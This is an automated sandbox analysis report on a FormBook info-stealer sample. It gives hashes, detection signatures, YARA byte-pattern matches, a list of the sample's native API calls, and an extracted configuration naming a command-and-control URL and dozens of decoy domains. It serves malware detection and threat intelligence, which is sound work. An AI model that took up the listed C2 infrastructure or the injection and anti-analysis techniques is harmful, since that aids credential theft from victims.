Loading ...

Play interactive tourEdit tour

Analysis Report SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.17259

Overview

General Information

Sample Name:SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.17259 (renamed file extension from 17259 to exe)
Analysis ID:356592
MD5:2915c0afb0b6b26a5a699965d2119f7a
SHA1:32fdcc2e0bcfc476347078d7ea05f12d5a259bea
SHA256:38b6a40d2eeddf38695294c57971fc2efab81fea95100260a2003baa13616b83

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
PE file contains sections with non-standard names
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.856380692.xyz/nsag/"], "decoy": ["usopencoverage.com", "5bo5j.com", "deliveryourvote.com", "bestbuycarpethd.com", "worldsourcecloud.com", "glowtheblog.com", "translations.tools", "ithacapella.com", "machinerysubway.com", "aashlokhospitals.com", "athara-kiano.com", "anabittencourt.com", "hakimkhawatmi.com", "fashionwatchesstore.com", "krishnagiri.info", "tencenttexts.com", "kodairo.com", "ouitum.club", "robertbeauford.net", "polling.asia", "evoslancete.com", "4676sabalkey.com", "chechadskeitaro.com", "babyhopeful.com", "11376.xyz", "oryanomer.com", "jyxxfy.com", "scanourworld.com", "thevistadrinksco.com", "meow-cafe.com", "xfixpros.com", "botaniquecouture.com", "bkhlep.xyz", "mauriciozarate.com", "icepolo.com", "siyezim.com", "myfeezinc.com", "nooshone.com", "wholesalerbargains.com", "winabeel.com", "frankfrango.com", "patientsbooking.info", "ineedahealer.com", "thefamilyorchard.net", "clericallyco.com", "overseaexpert.com", "bukaino.net", "womens-secrets.love", "skinjunkie.site", "dccheavydutydiv.net", "explorerthecity.com", "droneserviceshouston.com", "creationsbyjamie.com", "profirma-nachfolge.com", "oasisbracelet.com", "maurobenetti.com", "mecs.club", "mistressofherdivinity.com", "vooronsland.com", "navia.world", "commagx4.info", "caresring.com", "yourstrivingforexcellence.com", "alpinevalleytimeshares.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000001.209279370.0000000000400000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000003.00000001.209279370.0000000000400000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000003.00000001.209279370.0000000000400000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166b9:$sqlite3step: 68 34 1C 7B E1
    • 0x167cc:$sqlite3step: 68 34 1C 7B E1
    • 0x166e8:$sqlite3text: 68 38 2A 90 C5
    • 0x1680d:$sqlite3text: 68 38 2A 90 C5
    • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
    00000003.00000002.211005470.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000003.00000002.211005470.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 4 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      3.1.SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        3.1.SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        3.1.SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x166b9:$sqlite3step: 68 34 1C 7B E1
        • 0x167cc:$sqlite3step: 68 34 1C 7B E1
        • 0x166e8:$sqlite3text: 68 38 2A 90 C5
        • 0x1680d:$sqlite3text: 68 38 2A 90 C5
        • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
        3.2.SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          3.2.SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 1.2.SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe.2a50000.5.raw.unpackMalware Configuration Extractor: FormBook {"C2 list": ["www.856380692.xyz/nsag/"], "decoy": ["usopencoverage.com", "5bo5j.com", "deliveryourvote.com", "bestbuycarpethd.com", "worldsourcecloud.com", "glowtheblog.com", "translations.tools", "ithacapella.com", "machinerysubway.com", "aashlokhospitals.com", "athara-kiano.com", "anabittencourt.com", "hakimkhawatmi.com", "fashionwatchesstore.com", "krishnagiri.info", "tencenttexts.com", "kodairo.com", "ouitum.club", "robertbeauford.net", "polling.asia", "evoslancete.com", "4676sabalkey.com", "chechadskeitaro.com", "babyhopeful.com", "11376.xyz", "oryanomer.com", "jyxxfy.com", "scanourworld.com", "thevistadrinksco.com", "meow-cafe.com", "xfixpros.com", "botaniquecouture.com", "bkhlep.xyz", "mauriciozarate.com", "icepolo.com", "siyezim.com", "myfeezinc.com", "nooshone.com", "wholesalerbargains.com", "winabeel.com", "frankfrango.com", "patientsbooking.info", "ineedahealer.com", "thefamilyorchard.net", "clericallyco.com", "overseaexpert.com", "bukaino.net", "womens-secrets.love", "skinjunkie.site", "dccheavydutydiv.net", "explorerthecity.com", "droneserviceshouston.com", "creationsbyjamie.com", "profirma-nachfolge.com", "oasisbracelet.com", "maurobenetti.com", "mecs.club", "mistressofherdivinity.com", "vooronsland.com", "navia.world", "commagx4.info", "caresring.com", "yourstrivingforexcellence.com", "alpinevalleytimeshares.com"]}
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Temp\z9ayiyo.dllReversingLabs: Detection: 19%
          Multi AV Scanner detection for submitted fileShow sources
          Source: SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeVirustotal: Detection: 38%Perma Link
          Source: SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeReversingLabs: Detection: 31%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000003.00000001.209279370.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.211005470.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.211020267.0000000002A50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.1.SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe.2a50000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe.2a50000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.1.SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeJoe Sandbox ML: detected
          Source: 1.2.SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe.2a50000.5.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 3.2.SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 3.1.SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Compliance:

          barindex
          Uses 32bit PE filesShow sources
          Source: SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Contains modern PE file flags such as dynamic base (ASLR) or NXShow sources
          Source: SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Binary contains paths to debug symbolsShow sources
          Source: Binary string: wntdll.pdbUGP source: SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe, 00000001.00000003.206415100.0000000002C40000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe, 00000003.00000002.213181158.0000000000B1F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 1_2_00405A15 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,1_2_00405A15
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 1_2_004065C1 FindFirstFileA,FindClose,1_2_004065C1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 1_2_004027A1 FindFirstFileA,1_2_004027A1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 4x nop then pop esi3_2_00415843
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 4x nop then pop ebx3_2_00406A95
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 4x nop then pop edi3_2_004162BB
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 4x nop then pop edi3_2_00415675

          Networking:

          barindex
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.856380692.xyz/nsag/
          Source: SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 1_2_004054B2 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,1_2_004054B2

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000003.00000001.209279370.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.211005470.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.211020267.0000000002A50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.1.SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe.2a50000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe.2a50000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.1.SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000003.00000001.209279370.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000001.209279370.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.211005470.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.211005470.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.211020267.0000000002A50000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.211020267.0000000002A50000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.1.SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.1.SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe.2a50000.5.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe.2a50000.5.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe.2a50000.5.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe.2a50000.5.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.1.SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.1.SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_004181C0 NtCreateFile,3_2_004181C0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00418270 NtReadFile,3_2_00418270
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_004182F0 NtClose,3_2_004182F0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_004183A0 NtAllocateVirtualMemory,3_2_004183A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_0041817A NtCreateFile,3_2_0041817A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_004181BA NtCreateFile,3_2_004181BA
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_0041826A NtReadFile,3_2_0041826A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A69860 NtQuerySystemInformation,LdrInitializeThunk,3_2_00A69860
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A696E0 NtFreeVirtualMemory,LdrInitializeThunk,3_2_00A696E0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A69660 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_00A69660
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A698A0 NtWriteVirtualMemory,3_2_00A698A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A698F0 NtReadVirtualMemory,3_2_00A698F0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A69820 NtEnumerateKey,3_2_00A69820
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A69840 NtDelayExecution,3_2_00A69840
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A6B040 NtSuspendThread,3_2_00A6B040
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A699A0 NtCreateSection,3_2_00A699A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A699D0 NtCreateProcessEx,3_2_00A699D0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A69910 NtAdjustPrivilegesToken,3_2_00A69910
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A69950 NtQueueApcThread,3_2_00A69950
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A69A80 NtOpenDirectoryObject,3_2_00A69A80
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A69A20 NtResumeThread,3_2_00A69A20
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A69A00 NtProtectVirtualMemory,3_2_00A69A00
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A69A10 NtQuerySection,3_2_00A69A10
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A69A50 NtCreateFile,3_2_00A69A50
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A6A3B0 NtGetContextThread,3_2_00A6A3B0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A69B00 NtSetValueKey,3_2_00A69B00
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A695F0 NtQueryInformationFile,3_2_00A695F0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A695D0 NtClose,3_2_00A695D0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A69520 NtWaitForSingleObject,3_2_00A69520
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A6AD30 NtSetContextThread,3_2_00A6AD30
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A69560 NtWriteFile,3_2_00A69560
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A69540 NtReadFile,3_2_00A69540
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A696D0 NtCreateKey,3_2_00A696D0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A69610 NtEnumerateValueKey,3_2_00A69610
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A69670 NtQueryInformationProcess,3_2_00A69670
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A69650 NtQueryValueKey,3_2_00A69650
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A697A0 NtUnmapViewOfSection,3_2_00A697A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A69780 NtMapViewOfSection,3_2_00A69780
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A69FE0 NtCreateMutant,3_2_00A69FE0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A69730 NtQueryVirtualMemory,3_2_00A69730
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A69710 NtQueryInformationToken,3_2_00A69710
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A6A710 NtOpenProcessToken,3_2_00A6A710
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A69760 NtOpenProcess,3_2_00A69760
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A69770 NtSetInformationFile,3_2_00A69770
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A6A770 NtOpenThread,3_2_00A6A770
